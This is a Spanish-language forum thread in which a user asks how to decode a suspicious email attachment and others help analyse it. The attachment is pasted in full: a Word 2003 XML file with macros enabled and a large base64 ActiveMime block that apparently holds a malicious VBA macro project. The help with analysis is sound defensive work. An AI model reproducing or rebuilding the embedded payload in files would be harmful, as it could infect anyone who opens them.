Virus de macro en archivo .rtf

Iniciado por novato3, 20 Marzo 2016, 23:32 PM

0 Miembros y 1 Visitante están viendo este tema.

novato3

Hola a todos este archivo lo recibí por mail como archivo adjunto.
Dentro del código encuentro esto:

w:macrosPresent="yes" w:embeddedObjPresent="no" w:ocxPresent="no"

El código completo es el siguiente:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?mso-application progid="Word.Document"?>
<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:sl="http://schemas.microsoft.com/schemaLibrary/2003/core" xmlns:aml="http://schemas.microsoft.com/aml/2001/core" xmlns:wx="http://schemas.microsoft.com/office/word/2003/auxHint" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882" xmlns:wsp="http://schemas.microsoft.com/office/word/2003/wordml/sp2" w:macrosPresent="yes" w:embeddedObjPresent="no" w:ocxPresent="no" xml:space="preserve"><w:ignoreElements w:val="http://schemas.microsoft.com/office/word/2003/wordml/sp2"/><o:DocumentProperties><o:Title>    </o:Title><o:Author>gfdcdscdsccc</o:Author><o:LastAuthor>павуваыва</o:LastAuthor><o:Revision>4</o:Revision><o:TotalTime>3</o:TotalTime><o:Created>2016-03-17T08:03:00Z</o:Created><o:LastSaved>2016-03-17T12:58:00Z</o:LastSaved><o:Pages>1</o:Pages><o:Words>1</o:Words><o:Characters>12</o:Characters><o:Company>sdfdsf</o:Company><o:Lines>1</o:Lines><o:Paragraphs>1</o:Paragraphs><o:CharactersWithSpaces>12</o:CharactersWithSpaces><o:Version>11.0000</o:Version></o:DocumentProperties><w:fonts><w:defaultFonts w:ascii="Times New Roman" w:fareast="Times New Roman" w:h-ansi="Times New Roman" w:cs="Times New Roman"/></w:fonts><w:styles><w:versionOfBuiltInStylenames w:val="4"/><w:latentStyles w:defLockedState="off" w:latentStyleCount="156"/><w:style w:type="paragraph" w:default="on" w:styleId="a"><w:name w:val="Normal"/><wx:uiName wx:val="Обычный"/><w:rsid w:val="00A0471D"/><w:rPr><wx:font wx:val="Times New Roman"/><w:sz w:val="24"/><w:sz-cs w:val="24"/><w:lang w:val="RU" w:fareast="RU" w:bidi="AR-SA"/></w:rPr></w:style><w:style w:type="character" w:default="on" w:styleId="a0"><w:name w:val="Default Paragraph Font"/><wx:uiName wx:val="Основной шрифт абзаца"/><w:semiHidden/></w:style><w:style w:type="table" w:default="on" w:styleId="a1"><w:name w:val="Normal Table"/><wx:uiName wx:val="Обычная таблица"/><w:semiHidden/><w:rPr><wx:font wx:val="Times New Roman"/></w:rPr><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="list" w:default="on" w:styleId="a2"><w:name w:val="No List"/><wx:uiName wx:val="Нет списка"/><w:semiHidden/></w:style><w:style w:type="table" w:styleId="hgfdcdscccTable"><w:name w:val="hgfdcdsccc Table"/><w:semiHidden/><w:rsid w:val="00A0471D"/><w:rPr><wx:font wx:val="Times New Roman"/></w:rPr><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style></w:styles><w:docSuppData><w:binData w:name="dXwofzTuXeucPAU6FUix.mso">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
87YAAAvwBAAAABI0Vng=
</w:binData></w:docSuppData><w:docPr><w:view w:val="print"/><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:formsDesign/><w:attachedTemplate w:val=""/><w:defaultTabStop w:val="708"/><w:punctuationKerning/><w:characterSpacingControl w:val="DontCompress"/><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/><w:validateAgainstSchema/><w:saveInvalidXML w:val="off"/><w:ignoreMixedContent w:val="off"/><w:alwaysShowPlaceholderText w:val="off"/><w:compat><w:breakWrappedTables/><w:snapToGridInCell/><w:wrapTextWithPunct/><w:useAsianBreakRules/><w:dontGrowAutofit/></w:compat><wsp:rsids><wsp:rsidRoot wsp:val="000D47C0"/><wsp:rsid wsp:val="000D47C0"/><wsp:rsid wsp:val="00395638"/><wsp:rsid wsp:val="00576851"/><wsp:rsid wsp:val="00694D89"/><wsp:rsid wsp:val="00757B86"/><wsp:rsid wsp:val="00846A31"/><wsp:rsid wsp:val="00906632"/><wsp:rsid wsp:val="00A0471D"/><wsp:rsid wsp:val="00A20FF1"/><wsp:rsid wsp:val="00CF7E1D"/><wsp:rsid wsp:val="00EB7913"/></wsp:rsids></w:docPr><w:body><wx:sect><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"><w:r><w:t>    </w:t></w:r></w:p><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"><w:r><w:t>   </w:t></w:r></w:p><w:sectPr wsp:rsidR="000D47C0" wsp:rsidSect="00A0471D"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:line-pitch="360"/></w:sectPr></wx:sect></w:body></w:wordDocument>


La pregunta es ¿Cómo puedo descifrar ese código?

Saludos y gracias.

Pablo Videla

Todo el base64 es un binario por lo poco que vi al parecer es algo como esto:

"ActiveMime is simply zlib-compressed data starting at offset 0x32, then a standard OLE file with the VBA macro project"

Tiene la cabecera de ActiveMime, para que lo veas tu mismo, agarra el base64 y decodificalo aqui

http://www.freeformatter.com/base64-encoder.html

Flamer

Hola creo que te ayudara esta pagina


http://malware.unam.mx/es/content/an%C3%A1lisis-de-documentos-maliciosos-en-microsoft-word


para extraer el macro necesitamos el archivo

saludos flamer

novato3

Hola gracias por responder tan pronto.
@Pablo Videla: Probé desofuscar el código en esa y otras webs para el decode en base64 y no me arroja nada.  :-X , gracias de todas formas.
@Flamer: Gracias por el link, ya probé OfficeMalScanner pero aunque soporta archivos en formato .RTF me da error de formato, no lo reconoce como archivo .RTF  :-(

Citarpara extraer el macro necesitamos el archivo

Abrí el archivo con un editor y el código que pegué es lo único que hay, si lo pegas en un bloc de notas y lo guardas como loquesea.rtf ya tienes el archivo.

Gracias a todos, saludos.

Flamer

Aqui esta un adelanto, pero me falto no halle al 100 el codigo completo

[youtube=640,360]
https://www.youtube.com/watch?v=j6srzbKdnOE&feature=youtu.be
[/youtube]

saludos Flamer y le puse musica para que no se aburran  jajajaj

ThunderCls

Cita de: Flamer en 22 Marzo 2016, 03:22 AM
Aqui esta un adelanto, pero me falto no halle al 100 el codigo completo
saludos Flamer y le puse musica para que no se aburran  jajajaj

Creo que este link te puede ayudar a terminar el trabajo  ;)
https://reversec0de.wordpress.com/2016/04/13/accediendo-a-codigo-vba-protegido/
-[ "...I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/

Flamer

#6
Cita de: [ Thunder | CLS ] en 13 Abril 2016, 06:21 AM
Creo que este link te puede ayudar a terminar el trabajo  ;)
https://reversec0de.wordpress.com/2016/04/13/accediendo-a-codigo-vba-protegido/

hola Thunder ya había visto el vídeo hace unos días pero no este mensaje   jajaja

saludos y lo terminare, ahora are la tercera parte del analisis ya tengo material para mi blog